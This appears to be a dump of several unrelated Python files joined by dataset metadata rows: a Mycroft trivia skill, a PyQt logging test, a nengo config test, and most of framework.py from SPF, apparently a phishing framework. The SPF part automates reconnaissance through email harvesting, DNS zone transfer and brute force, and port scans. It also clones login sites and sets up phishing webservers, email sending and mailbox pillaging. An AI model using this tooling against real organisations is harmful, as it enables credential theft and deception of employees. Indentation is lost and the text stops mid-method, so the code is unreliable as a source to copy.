randdec.append(math.sqrt(random.randint(1, 100)) * random.randint(1, 10))
randsgnint.append(random.randint(-10, 10))
question = self.ft(question, randints, randdec,
randsgnint) # The function replaces all symbols in the question with the correct number types
answer = eval(self.ft(answer, randints, randdec,
randsgnint)) # This stores the numerical answer based on the string provided with the answer.
return question, answer
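    # Illustrative note (example values are assumptions, not fixed seeds):
    # ft() maps {0}->randints, {1}->randdec, {2}->randsgnint. With the
    # template "Solve for x in the equation {2[1]}x - {0[2]} = {2[7]}", if
    # randsgnint[1] == 4, randints[2] == 7 and randsgnint[7] == -3, the
    # question becomes "Solve for x in the equation 4x - 7 = -3" and the
    # answer string "({2[7]}+{0[2]})*1./{2[1]}" is eval()'d as
    # (-3+7)*1./4 == 1.0.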
class TriviaQuestions:
def __init__(self):
self.questions = {} #"categorie" : [[question, answer], [question, answer]]
self.categories = ["general", "geography", "history", "literature", "movies", "music", "science", "sports"]
self.load_questions()
def load_questions(self):
for cat in self.categories:
questions = []
answers = []
path = os.path.dirname(__file__) + '/' + cat + ".txt"
with open(path) as f:
lines = f.readlines()
i = 1
for line in lines:
if i % 2 == 0:
answers.append(line)
else:
questions.append(line)
i += 1
self.questions[cat] = []
for i in range(len(questions)):
self.questions[cat].append([questions[i], answers[i]])
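    # Illustrative note: each <categorie>.txt file is assumed to contain
    # alternating lines, question first, e.g.
    #   What is the capital of France?
    #   Paris
    # so odd lines are collected as questions and even lines as answers.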
def ask_question(self, categorie="general"):
question = random.choice(self.questions[categorie])
answer = question[1]
question = question[0]
return question, answer
class TriviaSkill(MycroftSkill):
def __init__(self):
super(TriviaSkill, self).__init__(name="TriviaSkill")
# initialize your variables
self.quizz = False
self.continuous = False
self.math = MathQuestions()
self.trivia = TriviaQuestions()
self.answer = None
self.categorie = "all"
self.categories = ["math", "general", "geography", "history", "literature", "movies", "music", "science", "sports"]
def initialize(self):
self.intent_parser = IntentParser(self.emitter)
# register intents
self.build_intents()
def build_intents(self):
# build
trivia_intent = IntentBuilder("TriviaGameIntent") \
.require("triviastart").build()
cat_intent = IntentBuilder("TriviaCategorieIntent") \
.require("Categorie").build()
geography_intent = IntentBuilder("GeographyQuestionIntent") \
.require("geography").build()
history_intent = IntentBuilder("HistoryQuestionIntent") \
.require("history").build()
literature_intent = IntentBuilder("LiteratureQuestionIntent") \
.require("literature").build()
math_intent = IntentBuilder("MathQuestionIntent") \
.require("math").build()
movie_intent = IntentBuilder("MovieQuestionIntent") \
.require("movie").build()
music_intent = IntentBuilder("MusicQuestionIntent") \
.require("music").build()
science_intent = IntentBuilder("ScienceQuestionIntent") \
.require("science").build()
sports_intent = IntentBuilder("SportsQuestionIntent") \
.require("sports").build()
general_intent = IntentBuilder("QuestionIntent") \
.require("question").build()
stop_intent = IntentBuilder("StopTriviaIntent") \
.require("stoptrivia").build()
# register
self.register_intent(trivia_intent,
self.handle_trivia_game_start)
self.register_intent(geography_intent,
self.handle_geography_question)
self.register_intent(history_intent,
self.handle_history_question)
self.register_intent(literature_intent,
self.handle_literature_question)
self.register_intent(math_intent,
self.handle_math_question)
self.register_intent(movie_intent,
self.handle_movies_question)
self.register_intent(music_intent,
self.handle_music_question)
self.register_intent(science_intent,
self.handle_science_question)
self.register_intent(sports_intent,
self.handle_sports_question)
self.register_intent(general_intent,
self.handle_general_question)
self.register_intent(cat_intent,
self.handle_change_cat_intent)
self.register_intent(stop_intent,
self.handle_stop_quizz)
def random_question(self):
if self.categorie == "math":
self.quizz = True
question, self.answer = self.math.ask_question()
elif self.categorie == "all":
self.quizz = True
cat = random.choice(self.categories)
if cat == "math":
question, self.answer = self.math.ask_question()
else:
question, self.answer = self.trivia.ask_question(cat)
else:
self.quizz = True
question, self.answer = self.trivia.ask_question(self.categorie)
return question
def handle_trivia_game_start(self, message):
if self.categorie == "all":
self.categorie = random.choice(self.categories)
self.speak_dialog("trivia", {"cat": self.categorie, "question":self.random_question()})
self.continuous = True
def handle_change_cat_intent(self, message):
cat = message.data["Categorie"].replace(" ","").replace('"',"")
if cat in self.categories:
self.categorie = cat
self.speak_dialog("categorie", {"cat": self.categorie})
else:
self.speak(cat + " is an invalid categorie")
def handle_math_question(self, message):
self.quizz = True
question, self.answer = self.math.ask_question()
self.speak(question, expect_response=True)
def handle_sports_question(self, message):
self.quizz = True
question, self.answer = self.trivia.ask_question("sports")
self.speak(question, expect_response=True)
def handle_movies_question(self, message):
self.quizz = True
question, self.answer = self.trivia.ask_question("movies")
self.speak(question, expect_response=True)
def handle_music_question(self, message):
self.quizz = True
question, self.answer = self.trivia.ask_question("music")
self.speak(question, expect_response=True)
def handle_literature_question(self, message):
self.quizz = True
question, self.answer = self.trivia.ask_question("literature")
self.speak(question, expect_response=True)
def handle_history_question(self, message):
self.quizz = True
question, self.answer = self.trivia.ask_question("history")
self.speak(question, expect_response=True)
def handle_geography_question(self, message):
self.quizz = True
question, self.answer = self.trivia.ask_question("geography")
self.speak(question, expect_response=True)
def handle_science_question(self, message):
self.quizz = True
question, self.answer = self.trivia.ask_question("science")
self.speak(question, expect_response=True)
def handle_general_question(self, message):
self.quizz = True
question, self.answer = self.trivia.ask_question()
self.speak(question, expect_response=True)
def handle_stop_quizz(self, message):
self.stop()
def stop(self):
if self.quizz or self.continuous:
self.speak("Exiting Quizz mode")
self.quizz = False
self.continuous = False
self.answer = None
self.categorie = "all"
def converse(self, transcript, lang="en-us"):
# check if some of the intents will be handled
intent, id = self.intent_parser.determine_intent(transcript[0])
if id == self.skill_id:
# intent from this skill will be triggered
# only stop, change categorie, specific questions intents available
pass
elif self.continuous and self.answer is not None:
self.speak_dialog("trivianext", {"ans" : str(self.answer), "question":self.random_question()}, expect_response=True)
return True
elif self.quizz and self.answer is not None:
self.speak("the correct answer is " + str(self.answer), expect_response=True)
self.quizz = False
self.answer = None
return True
return False
def create_skill():
return TriviaSkill() | gpl-3.0 | -7,013,586,128,043,303,000 | 38.645283 | 135 | 0.58991 | false |
asselapathirana/RRPam-WDS | src/rrpam_wds/tests/test_logging.py | 1 | 2109 | from rrpam_wds.gui import set_pyqt_api # isort:skip # NOQA
import sys
import time
from PyQt5.QtWidgets import QApplication
from rrpam_wds.gui.dialogs import LogDialog
from rrpam_wds.gui.dialogs import MainWindow
from rrpam_wds.tests.test_utils import Test_Parent
from rrpam_wds.tests.test_utils import main
class TC(Test_Parent):
def setUp(self): # special setup for this test set.
global start
self.app = QApplication.instance() or QApplication(sys.argv)
start = time.time()
def test_creating_main_window_will_write_log_messages(self):
self.aw = MainWindow()
log = self.aw.logdialog.get_text()
self.assertIn(self.aw.LOGSTARTMESSAGE, log)
self.aw.show_logwindow()
def test_calling_show_log_in_main_window_will_show_log_dialog(self):
self.aw = MainWindow()
self.assertFalse([x for x in self.aw.mdi.subWindowList()
if isinstance(x.widget(), LogDialog)])
self.aw.show_logwindow()
li = [x for x in self.aw.mdi.subWindowList() if isinstance(x.widget(), LogDialog)]
self.assertTrue(li)
self.assertEqual(li[0].widget(), self.aw.logdialog)
def test_calling_show_log_multiple_times_will_not_create_multiple_windows(self):
self.aw = MainWindow()
self.aw.show_logwindow()
li1 = self.aw.mdi.subWindowList()
self.aw.show_logwindow()
li2 = self.aw.mdi.subWindowList()
self.assertEqual(li1, li2)
    def test_closing_log_window_can_be_followed_by_opening_it_again_and_same_log_window_will_reappear(
            self):
self.aw = MainWindow()
self.aw.show_logwindow()
li1 = self.aw.mdi.subWindowList()
logdialog1 = [x for x in li1 if isinstance(x.widget(), LogDialog)][0]
logdialog1.close()
self.aw.show_logwindow()
li2 = self.aw.mdi.subWindowList()
logdialog2 = [x for x in li2 if isinstance(x.widget(), LogDialog)][0]
self.assertEqual(logdialog1.widget(), logdialog2.widget())
if __name__ == '__main__': # pragma: no cover
main(TC, test=False)
| gpl-3.0 | -5,391,814,945,688,619,000 | 35.362069 | 97 | 0.650545 | false |
ZeitgeberH/nengo | nengo/tests/test_config.py | 1 | 3332 | import pytest
import nengo
import nengo.config
def test_config():
@nengo.config.configures(nengo.Ensemble)
class TestConfigEnsemble(nengo.config.ConfigItem):
something = nengo.config.Parameter(None)
other = nengo.config.Parameter(0)
@nengo.config.configures(nengo.Connection)
class TestConfigConnection(nengo.config.ConfigItem):
something_else = nengo.config.Parameter(None)
class TestConfig(nengo.config.Config):
config_items = [TestConfigEnsemble, TestConfigConnection]
model = nengo.Network()
with model:
a = nengo.Ensemble(nengo.LIF(50), 1)
b = nengo.Ensemble(nengo.LIF(90), 1)
a2b = nengo.Connection(a, b, synapse=0.01)
config = TestConfig()
assert config[a].something is None
assert config[b].something is None
assert config[a].other == 0
assert config[b].other == 0
assert config[a2b].something_else is None
config[a].something = 'hello'
assert config[a].something == 'hello'
config[a].something = 'world'
assert config[a].something == 'world'
with pytest.raises(AttributeError):
config[a].something_else
config[a2b].something
with pytest.raises(AttributeError):
config[a].something_else = 1
config[a2b].something = 1
with pytest.raises(KeyError):
config['a'].something
with pytest.raises(KeyError):
config[None].something
with pytest.raises(KeyError):
config[model].something
def test_parameter_checking():
class PositiveParameter(nengo.config.Parameter):
def __set__(self, instance, value):
if not isinstance(value, (int, float)) or value <= 0:
raise AttributeError('value must be positive')
super(PositiveParameter, self).__set__(instance, value)
@nengo.config.configures(nengo.Ensemble)
class TestConfigEnsemble(nengo.config.ConfigItem):
number = PositiveParameter(1)
model = nengo.Network()
with model:
a = nengo.Ensemble(50, 1)
b = nengo.Ensemble(90, 1)
class TestConfig(nengo.config.Config):
config_items = [TestConfigEnsemble]
config = TestConfig()
config[a].number = 3
with pytest.raises(AttributeError):
config[a].number = 0
with pytest.raises(AttributeError):
config[b].number = 'a'
def test_invalid_config():
@nengo.config.configures(nengo.Ensemble)
class TestConfigEnsemble(nengo.config.ConfigItem):
number = nengo.config.Parameter(1)
class TestBadConfigConnection(nengo.config.ConfigItem):
number = nengo.config.Parameter(1)
with pytest.raises(AttributeError):
class TestConfig(nengo.config.Config):
pass
TestConfig()
with pytest.raises(AttributeError):
class TestConfig(nengo.config.Config):
config_items = [1, 2, 3]
TestConfig()
with pytest.raises(AttributeError):
class TestConfig(nengo.config.Config):
config_items = [TestBadConfigConnection]
TestConfig()
with pytest.raises(AttributeError):
class TestConfig(nengo.config.Config):
config_items = [TestConfigEnsemble, TestBadConfigConnection]
TestConfig()
if __name__ == '__main__':
nengo.log(debug=True)
pytest.main([__file__, '-v'])
| gpl-3.0 | 283,863,634,523,770,460 | 29.568807 | 72 | 0.654862 | false |
firebitsbr/SPF | spf/core/framework.py | 1 | 48936 | #import getopt
import argparse
import emails
import sys
import re
import os
import subprocess
import time
import signal
from collections import defaultdict
#import our libs
from emails import EmailTemplate
from utils import Utils
from display import Display
from gather import Gather
from mydns import Dns
from webprofiler import profiler
from mydb import MyDB
from sitecloner import SiteCloner
from mailpillager import MailPillager
import portscan
#import our modules
from modules.theharvester import theHarvester
#=================================================
# Primary CLASS
#=================================================
class Framework(object):
def __init__(self):
self.config = {} # dict to contain combined list of config file options and commandline parameters
self.email_list = [] # list of email targets
self.hostname_list = [] # list of dns hosts
self.server_list = {}
self.profile_valid_web_templates = []
self.profile_dynamic_web_templates = []
self.pillaged_users = []
self.bestMailServerPort = None
self.bestMailServer = None
self.webserver = None # web server process
self.webserverpid = None
self.gather = None
self.mp = None # mail pillager
# initialize some config options
self.config["domain_name"] = ""
self.config["phishing_domain"] = ""
self.config["company_name"] = ""
self.config["config_filename"] = ""
self.config["email_list_filename"] = ""
# default all bool values to False
self.config["verbose"] = False
self.config["gather_emails"] = False
self.config["gather_dns"] = False
self.config["enable_externals"] = False
self.config["enable_web"] = False
self.config["enable_email"] = False
self.config["enable_email_sending"] = False
self.config["simulate_email_sending"] = False
self.config["daemon_web"] = False
self.config["always_yes"] = False
self.config["enable_advanced"] = False
self.config["profile_domain"] = False
self.config["pillage_email"] = False
# get current IP
#self.config['ip'] = None
# set a few misc values
self.pid_path = os.path.dirname(os.path.realpath(__file__)) + "/../"
self.display = Display()
self.email_templates = defaultdict(list)
#==================================================
# SUPPORT METHODS
#==================================================
#----------------------------
# CTRL-C display and exit
#----------------------------
def ctrlc(self):
print
self.display.alert("Ctrl-C caught!!!")
self.cleanup()
#----------------------------
# Close everything down nicely
#----------------------------
def cleanup(self):
print
if (self.webserver is not None):
if (self.config["daemon_web"]):
self.display.alert("Webserver is still running as requested.")
else:
# send SIGTERM to the web process
self.display.output("stopping the webserver")
self.webserver.send_signal(signal.SIGINT)
# delete the pid file
os.remove(self.pid_path + "spfwebsrv.pid")
# as a double check, manually kill the process
self.killProcess(self.webserverpid)
# call report generation
self.generateReport()
# exit
sys.exit(0)
#----------------------------
# Kill specified process
#----------------------------
def killProcess(self, pid):
if (os.path.exists("/proc/" + str(pid))):
self.display.alert("Killing process [%s]" % (pid))
os.kill(pid, signal.SIGKILL)
if (os.path.isfile(self.pid_path + "spfwebsrv.pid")):
os.remove(self.pid_path + "spfwebsrv.pid")
#----------------------------
# Generate The simple report
#----------------------------
def generateReport(self):
self.display.output("Generating phishing report")
self.display.log("ENDTIME=%s\n" % (time.strftime("%Y/%m/%d %H:%M:%S")), filename="INFO.txt")
# Start process
cmd = [os.getcwd() + "/report.py", self.outdir]
self.display.output("Report file located at %s%s" % (self.outdir + "reports/", subprocess.check_output(cmd)))
#----------------------------
# Parse CommandLine Parms
#----------------------------
def parse_parameters(self, argv):
parser = argparse.ArgumentParser()
#==================================================
# Input Files
#==================================================
filesgroup = parser.add_argument_group('input files')
filesgroup.add_argument("-f",
metavar="<list.txt>",
dest="email_list_file",
action='store',
help="file containing list of email addresses")
filesgroup.add_argument("-C",
metavar="<config.txt>",
dest="config_file",
action='store',
help="config file")
#==================================================
# Enable Flags
#==================================================
enablegroup = parser.add_argument_group('enable flags')
enablegroup.add_argument("--all",
dest="enable_all",
action='store_true',
help="enable ALL flags... same as (-g --external -s -w -v -v -y)")
enablegroup.add_argument("--test",
dest="enable_test",
action='store_true',
help="enable all flags EXCEPT sending of emails... same as (-g --external --simulate -w -y -v -v)")
enablegroup.add_argument("--recon",
dest="enable_recon",
action='store_true',
help="gather info (i.e. email addresses, dns hosts, websites, etc...) same as (-e --dns)")
enablegroup.add_argument("--external",
dest="enable_external",
action='store_true',
help="enable external tool utilization")
enablegroup.add_argument("--dns",
dest="enable_gather_dns",
action='store_true',
help="enable automated gathering of dns hosts")
enablegroup.add_argument("-g",
dest="enable_gather_email",
action='store_true',
help="enable automated gathering of email targets")
enablegroup.add_argument("-s",
dest="enable_send_email",
action='store_true',
help="enable automated sending of phishing emails to targets")
enablegroup.add_argument("--simulate",
dest="simulate_send_email",
action='store_true',
help="simulate the sending of phishing emails to targets")
enablegroup.add_argument("-w",
dest="enable_web",
action='store_true',
help="enable generation of phishing web sites")
enablegroup.add_argument("-W",
dest="daemon_web",
action='store_true',
help="leave web server running after termination of spf.py")
#==================================================
# Advanced Flags
#==================================================
advgroup = parser.add_argument_group('ADVANCED')
advgroup.add_argument("--adv",
dest="enable_advanced",
action='store_true',
help="perform all ADVANCED features same as (--dns --profile --pillage)")
advgroup.add_argument("--profile",
dest="profile_domain",
action='store_true',
help="profile the target domain (requires the --dns flag)")
advgroup.add_argument("--pillage",
dest="pillage_email",
action='store_true',
help="auto pillage email accounts (requires the --dns flag)")
#==================================================
# Optional Args
#==================================================
parser.add_argument("-d",
metavar="<domain>",
dest="domain",
action='store',
help="domain name to phish")
parser.add_argument("-p",
metavar="<domain>",
dest="phishdomain",
default="example.com",
action='store',
help="newly registered 'phish' domain name")
parser.add_argument("-c",
metavar="<company's name>",
dest="company",
action='store',
help="name of company to phish")
parser.add_argument("--ip",
metavar="<IP address>",
dest="ip",
#default=Utils.getIP(),
action='store',
help="IP of webserver defaults to [%s]" % (Utils.getIP()))
parser.add_argument("-v", "--verbosity",
dest="verbose",
action='count',
help="increase output verbosity")
#==================================================
# Misc Flags
#==================================================
miscgroup = parser.add_argument_group('misc')
miscgroup.add_argument("-y",
dest="always_yes",
action='store_true',
help="automatically answer yes to all questions")
# parse args
args = parser.parse_args()
# convert parameters to values in the config dict
self.config["domain_name"] = args.domain
if (self.config["domain_name"] is None):
self.config["domain_name"] = ""
self.config["phishing_domain"] = args.phishdomain
if (self.config["phishing_domain"] is None):
self.config["phishing_domain"] = "example.com"
self.config["company_name"] = args.company
if (args.ip):
self.config["ip"] = args.ip
self.config["config_filename"] = args.config_file
self.config["email_list_filename"] = args.email_list_file
self.config["verbose"] = args.verbose
self.config["gather_emails"] = args.enable_gather_email
self.config["gather_dns"] = args.enable_gather_dns
self.config["profile_domain"] = args.profile_domain
self.config["pillage_email"] = args.pillage_email
self.config["enable_externals"] = args.enable_external
self.config["enable_web"] = args.enable_web
self.config["enable_email_sending"] = args.enable_send_email
self.config["simulate_email_sending"] = args.simulate_send_email
self.config["daemon_web"] = args.daemon_web
self.config["always_yes"] = args.always_yes
# process meta flags
# recon = gather emails and gather dns
if (args.enable_recon == True):
self.config["gather_emails"] = True
self.config["gather_dns"] = True
# all = gather emails, enable externals, etc...
if (args.enable_all == True):
self.config["gather_emails"] = True
self.config["enable_externals"] = True
self.config["enable_web"] = True
self.config["enable_email_sending"] = True
self.config["verbose"] = 2
self.config["always_yes"] = True
# test = gather emails, enable externals, etc...
if (args.enable_test == True):
self.config["gather_emails"] = True
self.config["enable_externals"] = True
self.config["simulate_email_sending"] = True
self.config["enable_web"] = True
self.config["always_yes"] = True
self.config["verbose"] = 2
# advanced = dns, profile, and pillage
if (args.enable_advanced == True):
self.config["gather_dns"] = True
self.config["profile_domain"] = True
self.config["pillage_email"] = True
# profile requires dns
if (self.config["profile_domain"] and not self.config["gather_dns"]):
self.config["profile_domain"] = False
self.display.error("--profile requires the --dns option to be enabled as well.")
# pillage requires dns
if (self.config["pillage_email"] and not self.config["gather_dns"]):
self.config["pillage_email"] = False
self.display.error("--pillage requires the --dns option to be enabled as well.")
# see if we are good to go
good = False
if (self.config["email_list_filename"]
or self.config["gather_emails"]
or self.config["enable_externals"]
or self.config["enable_web"]
or self.config["enable_email_sending"]
or self.config["simulate_email_sending"]
or self.config["gather_dns"]
or self.config["profile_domain"]
or self.config["pillage_email"]):
good = True
if (not good):
self.display.error("Please enable at least one of the following parameters: -g --external --dns -s --simulate -w ( --all --test --recon --adv )")
print
parser.print_help()
sys.exit(1)
#----------------------------
# Process/Load config file
#----------------------------
def load_config(self):
# does config file exist?
if (self.config["config_filename"] is not None):
temp1 = self.config
temp2 = Utils.load_config(self.config["config_filename"])
self.config = dict(temp2.items() + temp1.items())
else:
# guess not.. so try to load the default one
if Utils.is_readable("default.cfg"):
self.display.error("a CONFIG FILE was not specified... defaulting to [default.cfg]")
print
temp1 = self.config
temp2 = Utils.load_config("default.cfg")
self.config = dict(temp2.items() + temp1.items())
else:
# someone must have removed it!
self.display.error("a CONFIG FILE was not specified...")
print
sys.exit(1)
# set verbosity/debug level
if (self.config['verbose'] >= 1):
self.display.enableVerbose()
if (self.config['verbose'] > 1):
self.display.enableDebug()
if (self.config["ip"] == "0.0.0.0") or (self.config["ip"] == None):
self.config["ip"]=Utils.getIP()
# set logging path
self.outdir = os.getcwd() + "/" + self.config["domain_name"] + "_" + self.config["phishing_domain"] + "/"
if not os.path.exists(os.path.dirname(self.outdir)):
os.makedirs(os.path.dirname(self.outdir))
self.display.setLogPath(self.outdir + "logs/")
# create sqllite db
self.db = MyDB(sqlite_file=self.outdir)
# log it
self.display.log("STARTTIME=%s\n" % (time.strftime("%Y/%m/%d %H:%M:%S")), filename="INFO.txt")
self.display.log("TARGETDOMAIN=%s\n" % (self.config["domain_name"]), filename="INFO.txt")
self.display.log("PHISHINGDOMAIN=%s\n" % (self.config["phishing_domain"]), filename="INFO.txt")
#----------------------------
# Load/Gather target email addresses
#----------------------------
def prep_email(self):
# are required flags set?
if ((self.config["email_list_filename"] is not None) or (self.config["gather_emails"] == True)):
print
self.display.output("Obtaining list of email targets")
if (self.config["always_yes"] or self.display.yn("Continue", default="y")):
# if an external email list file was specified, read it in
if self.config["email_list_filename"] is not None:
file = open(self.config["email_list_filename"], 'r')
temp_list = file.read().splitlines()
self.display.verbose("Loaded [%s] email addresses from [%s]" % (len(temp_list), self.config["email_list_filename"]))
self.email_list += temp_list
# gather email addresses
if self.config["gather_emails"] == True:
if (self.config["domain_name"] == ""):
self.display.error("No target domain specified. Can not gather email addresses.")
else:
self.display.verbose("Gathering emails via built-in methods")
self.display.verbose(Gather.get_sources())
if (not self.gather):
self.gather = Gather(self.config["domain_name"], display=self.display)
temp_list = self.gather.emails()
self.display.verbose("Gathered [%s] email addresses from the Internet" % (len(temp_list)))
self.email_list += temp_list
print
# gather email addresses from external sources
if (self.config["gather_emails"] == True) and (self.config["enable_externals"] == True):
# theHarvester
self.display.verbose("Gathering emails via theHarvester")
thr = theHarvester(self.config["domain_name"], self.config["theharvester_path"], display=self.display)
out = thr.run()
if (not out):
temp_list = thr.emails()
self.display.verbose("Gathered [%s] email addresses from theHarvester" % (len(temp_list)))
self.email_list += temp_list
else:
self.display.error(out)
print
# # Recon-NG
# self.display.verbose("Gathering emails via Recon-NG")
# temp_list = reconng(self.config["domain_name"], self.config["reconng_path"]).gather()
# self.display.verbose("Gathered [%s] email addresses from Recon-NG" % (len(temp_list)))
# self.email_list += temp_list
# sort/unique email list
self.email_list = Utils.unique_list(self.email_list)
self.email_list.sort()
# add each user to the sqllite db
self.db.addUsers(self.email_list)
# print list of email addresses
self.display.verbose("Collected [%s] unique email addresses" % (len(self.email_list)))
self.display.print_list("EMAIL LIST",self.email_list)
for email in self.email_list:
self.display.log(email + "\n", filename="email_targets.txt")
#----------------------------
# Gather dns hosts
#----------------------------
def gather_dns(self):
# are required flags set?
if (self.config["gather_dns"] == True):
print
self.display.output("Obtaining list of host on the %s domain" % (self.config["domain_name"]))
self.display.verbose("Gathering hosts via built-in methods")
# Gather hosts from internet search
self.display.verbose(Gather.get_sources())
if (not self.gather):
self.gather = Gather(self.config["domain_name"], display=self.display)
temp_list = self.gather.hosts()
self.display.verbose("Gathered [%s] hosts from the Internet Search" % (len(temp_list)))
self.hostname_list += temp_list
# Gather hosts from DNS lookups
temp_list = Dns.xfr(self.config["domain_name"])
self.display.verbose("Gathered [%s] hosts from DNS Zone Transfer" % (len(temp_list)))
self.hostname_list += temp_list
temp_list = Dns.ns(self.config["domain_name"])
temp_list = Utils.filterList(temp_list, self.config["domain_name"])
self.display.verbose("Gathered [%s] hosts from DNS NS lookups" % (len(temp_list)))
self.hostname_list += temp_list
temp_list = Dns.mx(self.config["domain_name"])
temp_list = Utils.filterList(temp_list, self.config["domain_name"])
self.display.verbose("Gathered [%s] hosts from DNS MX lookups" % (len(temp_list)))
self.hostname_list += temp_list
# Gather hosts from dictionary lookup
            # reset first so a failed lookup does not re-report the MX results
            temp_list = []
            try:
                temp_list = Dns.brute(self.config["domain_name"], display=self.display)
            except:
                pass
            self.display.verbose("Gathered [%s] hosts from DNS BruteForce/Dictionary Lookup" % (len(temp_list)))
self.hostname_list += temp_list
# sort/unique hostname list
self.hostname_list = Utils.unique_list(self.hostname_list)
self.hostname_list.sort()
# add list of identified hosts to sqllite db
self.db.addHosts(self.hostname_list)
# print list of hostnames
self.display.verbose("Collected [%s] unique host names" % (len(self.hostname_list)))
self.display.print_list("HOST LIST", self.hostname_list)
#----------------------------
# Perform Port Scans
#----------------------------
def port_scan(self):
# are required flags set?
if (self.config["gather_dns"] == True):
self.display.output("Performing basic port scans of any identified hosts.")
# define list of ports to scan for
ports = [25, 80,110, 143, 443, 993, 995]
# prep array of arrays
for port in ports:
self.server_list[port] = []
# for each host in the host list
for host in self.hostname_list:
# run port scan
openports = portscan.scan(host, ports)
found = False
# for any open ports, add it to the associated list
for port in openports:
self.db.addPort(port, host)
if (port == 80):
self.display.verbose("Found website at: %s 80" % (host))
self.server_list[80].append(host)
found = True
elif (port == 443):
self.display.verbose("Found website at: %s 443" % (host))
self.server_list[443].append(host)
found = True
elif (port == 110):
self.display.verbose("Found POP at : %s 110" % (host))
self.server_list[110].append(host)
found = True
elif (port == 995):
self.display.verbose("Found POPS at : %s 995" % (host))
self.server_list[995].append(host)
found = True
elif (port == 143):
self.display.verbose("Found IMAP at : %s 143" % (host))
self.server_list[143].append(host)
found = True
elif (port == 993):
self.display.verbose("Found IMAPS at : %s 993" % (host))
self.server_list[993].append(host)
found = True
elif (port == 25):
self.display.verbose("Found SMTP at : %s 25" % (host))
self.server_list[25].append(host)
found = True
if (found):
self.display.log(host + "\n", filename="hosts.txt")
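    #----------------------------
    # Illustrative sketch only: an assumed approximation of what the
    # bundled portscan.scan() helper does (a plain TCP connect scan).
    # The framework never calls this stand-in; it documents the expected
    # contract of portscan.scan(host, ports) used above.
    #----------------------------
    @staticmethod
    def _tcp_connect_scan_sketch(host, ports, timeout=2):
        import socket
        open_ports = []
        for port in ports:
            s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
            s.settimeout(timeout)
            try:
                # connect_ex returns 0 when the TCP handshake succeeds
                if s.connect_ex((host, port)) == 0:
                    open_ports.append(port)
            except socket.error:
                pass
            finally:
                s.close()
        return open_ports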
#----------------------------
# Profile Web Sites
#----------------------------
def profile_site(self):
# are required flags set?
if (self.config["profile_domain"] == True):
self.display.output("Determining if any of the identified hosts have web servers.")
# for hosts in the port 80 list
for host in self.server_list[80]:
# create a profiler object
p = profiler()
# run it against the website
profile_results = p.run("http://" + host, debug=False)
# if we got valid results, look to see if we have a match for one of the templates
if (profile_results and (len(profile_results) > 0)):
max_key = ""
max_value = 0
for key, value in profile_results:
if (value.getscore() > max_value):
max_key = key
max_value = value.getscore()
if (max_value > 0):
self.display.verbose("POSSIBLE MATCH FOR [http://%s] => [%s]" % (host, max_key))
self.profile_valid_web_templates.append(max_key)
else:
                    # otherwise we will see about adding it to a list of sites to clone
if (p.hasLogin("http://" + host)):
self.profile_dynamic_web_templates.append("http://" + host)
# repeat same as for port 80
for host in self.server_list[443]:
p = profiler()
profile_results = p.run("https://" + host, debug=False)
if (profile_results and (len(profile_results) > 0)):
max_key = ""
max_value = 0
for key, value in profile_results:
if (value.getscore() > max_value):
max_key = key
max_value = value.getscore()
if (max_value > 0):
self.display.verbose("POSSIBLE MATCH FOR [https://%s] => [%s]" % (host, max_key))
self.profile_valid_web_templates.append(max_key)
else:
if (p.hasLogin("https://" + host)):
self.display.verbose("POSSIBLE DYNAMIC TEMPLATE SITE [https://%s]" % (host))
self.profile_dynamic_web_templates.append("https://" + host)
# sort/unique list of valid templates
self.profile_valid_web_templates = Utils.unique_list(self.profile_valid_web_templates)
self.profile_valid_web_templates.sort()
# print list of valid templatess
self.display.verbose("Collected [%s] valid web templates" % (len(self.profile_valid_web_templates)))
self.display.print_list("VALID TEMPLATE LIST",self.profile_valid_web_templates)
# sort/unique list of dynamic templates
self.profile_dynamic_web_templates = Utils.unique_list(self.profile_dynamic_web_templates)
self.profile_dynamic_web_templates.sort()
# print list of valid templatess
self.display.verbose("Collected [%s] dynamic web templates" % (len(self.profile_dynamic_web_templates)))
self.display.print_list("DYNAMIC TEMPLATE LIST",self.profile_dynamic_web_templates)
            # lowercase, sort and unique the dynamic template list
self.profile_dynamic_web_templates = Utils.lowercase_list(self.profile_dynamic_web_templates)
self.profile_dynamic_web_templates = Utils.unique_list(self.profile_dynamic_web_templates)
self.profile_dynamic_web_templates.sort()
# for any dynamic sites, try to clone them
self.display.output("Cloning any DYNAMIC sites")
for template in self.profile_dynamic_web_templates:
sc = SiteCloner(clone_dir=self.outdir+"web_clones/")
tdir = sc.cloneUrl(template)
self.display.verbose("Cloning [%s] to [%s]" % (template, tdir))
self.db.addWebTemplate(ttype="dynamic", src_url=template, tdir=tdir)
            # loop over all built-in templates
for f in os.listdir(self.config["web_template_path"]):
template_file = os.path.join(self.config["web_template_path"], f) + "/CONFIG"
for line in open(template_file).readlines():
for tem in self.profile_valid_web_templates:
if re.match("^VHOST=\s*"+tem+"\s*$", line, re.IGNORECASE):
self.db.addWebTemplate(ttype="static", src_url="", tdir=os.path.join(self.config["web_template_path"], f))
break
#----------------------------
# Select Web Templates
#----------------------------
def select_web_templates(self):
templates = []
# get lists of current templates
db_static_templates = self.db.getWebTemplates(ttype="static")
db_dynamic_templates = self.db.getWebTemplates(ttype="dynamic")
# check to see if we have templates
if (db_static_templates or db_dynamic_templates):
for template in db_static_templates:
parts = template.split("[-]")
template_file = parts[0] + "/CONFIG"
if Utils.is_readable(template_file) and os.path.isfile(template_file):
templates.append(("static", parts[0], parts[1]))
for template in db_dynamic_templates:
parts = template.split("[-]")
template_file = parts[0] + "/CONFIG"
if Utils.is_readable(template_file) and os.path.isfile(template_file):
templates.append(("dynamic", parts[0], parts[1]))
else:
# assume we do not have any valid templates
# load all standard templates
for f in os.listdir(self.config["web_template_path"]):
template_file = os.path.join(self.config["web_template_path"], f) + "/CONFIG"
if Utils.is_readable(template_file) and os.path.isfile(template_file):
templates.append(("static", os.path.join(self.config["web_template_path"], f), ""))
print "FIXED = [%s]" % (os.path.join(self.config["web_template_path"], f))
# if "always yes" is enabled then just use all templates
if (not self.config["always_yes"]):
            items = self.display.selectlist("Please select (comma separated) the item(s) you wish to use. : ", templates)
templates_temp = []
self.db.clearWebTemplates()
for item in items:
print templates[int(item)-1]
templates_temp.append(templates[int(item)-1])
self.db.addWebTemplate(ttype=templates[int(item)-1][0], src_url=templates[int(item)-1][2], tdir=templates[int(item)-1][1])
templates = templates_temp
# print list of enabled templates
self.display.print_list("TEMPLATE LIST", templates)
#----------------------------
# Load web sites
#----------------------------
def load_websites(self):
        # are required flags set?
if self.config["enable_web"] == True:
self.select_web_templates()
print
self.display.output("Starting phishing webserver")
if (self.config["always_yes"] or self.display.yn("Continue", default="y")):
